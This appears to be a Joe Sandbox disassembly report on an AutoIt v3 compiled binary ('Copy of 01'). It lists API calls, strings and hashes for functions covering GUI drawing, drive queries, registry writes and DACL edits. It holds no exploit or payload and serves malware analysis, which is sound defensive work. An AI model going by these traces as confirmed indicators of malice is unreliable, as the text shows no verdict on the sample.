                        • Instruction Fuzzy Hash: 9FA19D72018301AFDB029F61DC48E6BBBA9FB89320F141A19F966D61E1D731F944CF91
                        Function 003B2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 003B273E
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003B286A
                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 003B28A9
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 003B28B9
                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 003B2900
                        • GetClientRect.USER32(00000000,?), ref: 003B290C
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 003B2955
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003B2964
                        • GetStockObject.GDI32(00000011), ref: 003B2974
                        • SelectObject.GDI32(00000000,00000000), ref: 003B2978
                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 003B2988
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B2991
                        • DeleteDC.GDI32(00000000), ref: 003B299A
                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003B29C6
                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 003B29DD
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 003B2A1D
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003B2A31
                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 003B2A42
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 003B2A77
                        • GetStockObject.GDI32(00000011), ref: 003B2A82
                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003B2A8D
                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 003B2A97
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: d3acf987375aa4005f98f9d9ed8871945171250656263509393ffb4df2e5bdad
                        • Instruction ID: 47d3c41e0db9b6075c80a6dae26884b68283f6b53f1be8cacb8f46508ac3dabc
                        • Opcode Fuzzy Hash: d3acf987375aa4005f98f9d9ed8871945171250656263509393ffb4df2e5bdad
                        • Instruction Fuzzy Hash: 32B16F71A10215AFEB15DF69CD8AFAF7BA9EB09714F004114FA14EB6A0D770ED40CB54
                        Function 003A4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 003A4AED
                        • GetDriveTypeW.KERNEL32(?,003CCB68,?,\\.\,003CCC08), ref: 003A4BCA
                        • SetErrorMode.KERNEL32(00000000,003CCB68,?,\\.\,003CCC08), ref: 003A4D36
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                        • API String ID: 2907320926-4222207086
                        • Opcode ID: aa1d843e30b8bf25d6b1e2476a2d4acf56e6064aaaeca6166b66b9f1c96c6ff7
                        • Instruction ID: 8e601fa9b2b52eda7385b550fa07c232c82e35b140d6f3e6617f19caf608e3cb
                        • Opcode Fuzzy Hash: aa1d843e30b8bf25d6b1e2476a2d4acf56e6064aaaeca6166b66b9f1c96c6ff7
                        • Instruction Fuzzy Hash: 0061D330605309EBCB07DF28CA83DBC77B4EB86350B248415F90AABA56DBB1ED41DB51
                        Function 003C73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000012), ref: 003C7421
                        • SetTextColor.GDI32(?,?), ref: 003C7425
                        • GetSysColorBrush.USER32(0000000F), ref: 003C743B
                        • GetSysColor.USER32(0000000F), ref: 003C7446
                        • CreateSolidBrush.GDI32(?), ref: 003C744B
                        • GetSysColor.USER32(00000011), ref: 003C7463
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003C7471
                        • SelectObject.GDI32(?,00000000), ref: 003C7482
                        • SetBkColor.GDI32(?,00000000), ref: 003C748B
                        • SelectObject.GDI32(?,?), ref: 003C7498
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003C74B7
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003C74CE
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C74DB
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C752A
                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003C7554
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 003C7572
                        • DrawFocusRect.USER32(?,?), ref: 003C757D
                        • GetSysColor.USER32(00000011), ref: 003C758E
                        • SetTextColor.GDI32(?,00000000), ref: 003C7596
                        • DrawTextW.USER32(?,003C70F5,000000FF,?,00000000), ref: 003C75A8
                        • SelectObject.GDI32(?,?), ref: 003C75BF
                        • DeleteObject.GDI32(?), ref: 003C75CA
                        • SelectObject.GDI32(?,?), ref: 003C75D0
                        • DeleteObject.GDI32(?), ref: 003C75D5
                        • SetTextColor.GDI32(?,?), ref: 003C75DB
                        • SetBkColor.GDI32(?,?), ref: 003C75E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1996641542-0
                        • Opcode ID: bc7343f4ffeee0de42d74e649a8a98b98cc63aff7a8ade4f3975eef2ce5bd6b2
                        • Instruction ID: 715b4e6cee5a6aebe8a912339a843f62d286d9c097b4e938db49f3cb53a7add1
                        • Opcode Fuzzy Hash: bc7343f4ffeee0de42d74e649a8a98b98cc63aff7a8ade4f3975eef2ce5bd6b2
                        • Instruction Fuzzy Hash: C8615972900218AFDB029FA5DC49EAEBFB9EB09320F155115F919EB2A1D771AD40CF90
                        Function 003C0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 003C1128
                        • GetDesktopWindow.USER32 ref: 003C113D
                        • GetWindowRect.USER32(00000000), ref: 003C1144
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C1199
                        • DestroyWindow.USER32(?), ref: 003C11B9
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003C11ED
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C120B
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003C121D
                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 003C1232
                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 003C1245
                        • IsWindowVisible.USER32(00000000), ref: 003C12A1
                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 003C12BC
                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 003C12D0
                        • GetWindowRect.USER32(00000000,?), ref: 003C12E8
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 003C130E
                        • GetMonitorInfoW.USER32(00000000,?), ref: 003C1328
                        • CopyRect.USER32(?,?), ref: 003C133F
                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 003C13AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                        • String ID: ($0$tooltips_class32
                        • API String ID: 698492251-4156429822
                        • Opcode ID: b8bb5b61e1cde6a897ef62bac4bd09794732bb412181b59c29f8a36f39094080
                        • Instruction ID: d072f7e5bcbb4962c96b3df070fe53ce5d5aba2c2707745c411075c11a1247f3
                        • Opcode Fuzzy Hash: b8bb5b61e1cde6a897ef62bac4bd09794732bb412181b59c29f8a36f39094080
                        • Instruction Fuzzy Hash: 25B16671604341AFD711DF64C984F6ABBE8AB89344F00891CF999DB2A2C771EC44DB92
                        Function 003C0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 003C02E5
                        • _wcslen.LIBCMT ref: 003C031F
                        • _wcslen.LIBCMT ref: 003C0389
                        • _wcslen.LIBCMT ref: 003C03F1
                        • _wcslen.LIBCMT ref: 003C0475
                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003C04C5
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003C0504
                          • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
                          • Part of subcall function 0039223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00392258
                          • Part of subcall function 0039223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0039228A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$MessageSend$BuffCharUpper
                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                        • API String ID: 1103490817-719923060
                        • Opcode ID: 88391434dd26fc6533f9f8e43855adebc272b59e36de61f419c590cb5555ac5f
                        • Instruction ID: 6d98e9eee2ffa1eadc5d12138b3a0e985c9b8d16ef9273168fcf4f26de49852d
                        • Opcode Fuzzy Hash: 88391434dd26fc6533f9f8e43855adebc272b59e36de61f419c590cb5555ac5f
                        • Instruction Fuzzy Hash: BDE19B35208281CFCB1ADF24C591E2AB3E6BF89714F15495CF896AB6A1DB30ED45CB41
                        Function 00348891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00348968
                        • GetSystemMetrics.USER32(00000007), ref: 00348970
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0034899B
                        • GetSystemMetrics.USER32(00000008), ref: 003489A3
                        • GetSystemMetrics.USER32(00000004), ref: 003489C8
                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003489E5
                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003489F5
                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00348A28
                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00348A3C
                        • GetClientRect.USER32(00000000,000000FF), ref: 00348A5A
                        • GetStockObject.GDI32(00000011), ref: 00348A76
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00348A81
                          • Part of subcall function 0034912D: GetCursorPos.USER32(?), ref: 00349141
                          • Part of subcall function 0034912D: ScreenToClient.USER32(00000000,?), ref: 0034915E
                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000001), ref: 00349183
                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000002), ref: 0034919D
                        • SetTimer.USER32(00000000,00000000,00000028,003490FC), ref: 00348AA8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                        • String ID: AutoIt v3 GUI
                        • API String ID: 1458621304-248962490
                        • Opcode ID: 868fd4454fe2f4e5f3e2338af3d2a93b3c171f7f3498dedcaf24a7313ad5ccf2
                        • Instruction ID: a6d4c405e7dc08f85e6c8a23f6d3b57781c2327a42bfb293571dc5b431fe5992
                        • Opcode Fuzzy Hash: 868fd4454fe2f4e5f3e2338af3d2a93b3c171f7f3498dedcaf24a7313ad5ccf2
                        • Instruction Fuzzy Hash: 6DB17D71A002099FDB16EFA8CD45FAE3BB5FB48314F114229FA15EB2A0DB74E940CB55
                        Function 00390D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
                          • Part of subcall function 003910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
                          • Part of subcall function 003910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
                          • Part of subcall function 003910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00390DF5
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00390E29
                        • GetLengthSid.ADVAPI32(?), ref: 00390E40
                        • GetAce.ADVAPI32(?,00000000,?), ref: 00390E7A
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00390E96
                        • GetLengthSid.ADVAPI32(?), ref: 00390EAD
                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00390EB5
                        • HeapAlloc.KERNEL32(00000000), ref: 00390EBC
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00390EDD
                        • CopySid.ADVAPI32(00000000), ref: 00390EE4
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00390F13
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00390F35
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00390F47
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F6E
                        • HeapFree.KERNEL32(00000000), ref: 00390F75
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F7E
                        • HeapFree.KERNEL32(00000000), ref: 00390F85
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F8E
                        • HeapFree.KERNEL32(00000000), ref: 00390F95
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00390FA1
                        • HeapFree.KERNEL32(00000000), ref: 00390FA8
                          • Part of subcall function 00391193: GetProcessHeap.KERNEL32(00000008,00390BB1,?,00000000,?,00390BB1,?), ref: 003911A1
                          • Part of subcall function 00391193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00390BB1,?), ref: 003911A8
                          • Part of subcall function 00391193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00390BB1,?), ref: 003911B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                        • String ID:
                        • API String ID: 4175595110-0
                        • Opcode ID: 9118ff68a6fa784a231ee95420e28172719fed76c4b9c8bfb3561ecf612338a6
                        • Instruction ID: 591d971b0f1597b3d5939c7dfc5c3007eb66dd5c2b79112fbaf8c5791a471300
                        • Opcode Fuzzy Hash: 9118ff68a6fa784a231ee95420e28172719fed76c4b9c8bfb3561ecf612338a6
                        • Instruction Fuzzy Hash: D871597290021AAFDF269FA5DC48FAEBBBCFF04300F054115F91AE6291D731AA05CB60
                        Function 003BC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BC4BD
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,003CCC08,00000000,?,00000000,?,?), ref: 003BC544
                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 003BC5A4
                        • _wcslen.LIBCMT ref: 003BC5F4
                        • _wcslen.LIBCMT ref: 003BC66F
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 003BC6B2
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 003BC7C1
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 003BC84D
                        • RegCloseKey.ADVAPI32(?), ref: 003BC881
                        • RegCloseKey.ADVAPI32(00000000), ref: 003BC88E
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 003BC960
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 9721498-966354055
                        • Opcode ID: a44e56ba7eeef1045cc32d0ac30e5f1cacbda09f5e43cd4bfc2eb64beb08b22b
                        • Instruction ID: 6f11561fe6292c89576c63abb5bc83f46801c57097d88303a9f37c2d5e22fbd2
                        • Opcode Fuzzy Hash: a44e56ba7eeef1045cc32d0ac30e5f1cacbda09f5e43cd4bfc2eb64beb08b22b
                        • Instruction Fuzzy Hash: C01287752142009FDB26DF14C881E6AB7E5EF89718F05885DF98A9B7A2DB31FC41CB81
                        Function 003C091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 003C09C6
                        • _wcslen.LIBCMT ref: 003C0A01
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C0A54
                        • _wcslen.LIBCMT ref: 003C0A8A
                        • _wcslen.LIBCMT ref: 003C0B06
                        • _wcslen.LIBCMT ref: 003C0B81
                          • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
                          • Part of subcall function 00392BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00392BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$MessageSend$BuffCharUpper
                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                        • API String ID: 1103490817-4258414348
                        • Opcode ID: 1efeb9daeccfdde1dbecda061492c0be34fbb97194629e0991d863646eeafa4f
                        • Instruction ID: f24ed68e8ecccad1ec1a7c4a5ff5d992e74fbc8c0b3e2e6e820fd2c4bb57b205
                        • Opcode Fuzzy Hash: 1efeb9daeccfdde1dbecda061492c0be34fbb97194629e0991d863646eeafa4f
                        • Instruction Fuzzy Hash: D0E17935208741DFCB1AEF28C490A2AB7E1BF98314F15895CF8969B762D731ED45CB81
                        Function 003BC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                        • API String ID: 1256254125-909552448
                        • Opcode ID: d6b6a0f05573936316549639a5926843304a40e639883f248469301292f6536e
                        • Instruction ID: 0d3f1788521cc8f6aa39382c0ff705bae852c994b1549ed7e359c294a2a97f2a
                        • Opcode Fuzzy Hash: d6b6a0f05573936316549639a5926843304a40e639883f248469301292f6536e
                        • Instruction Fuzzy Hash: 5C71163262012A8BCB32DE3CCD415FF3795AB60758F262128FE55ABA85E731DD4583A0
                        Function 003C833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 003C835A
                        • _wcslen.LIBCMT ref: 003C836E
                        • _wcslen.LIBCMT ref: 003C8391
                        • _wcslen.LIBCMT ref: 003C83B4
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003C83F2
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003C5BF2), ref: 003C844E
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003C8487
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003C84CA
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003C8501
                        • FreeLibrary.KERNEL32(?), ref: 003C850D
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003C851D
                        • DestroyIcon.USER32(?,?,?,?,?,003C5BF2), ref: 003C852C
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003C8549
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003C8555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
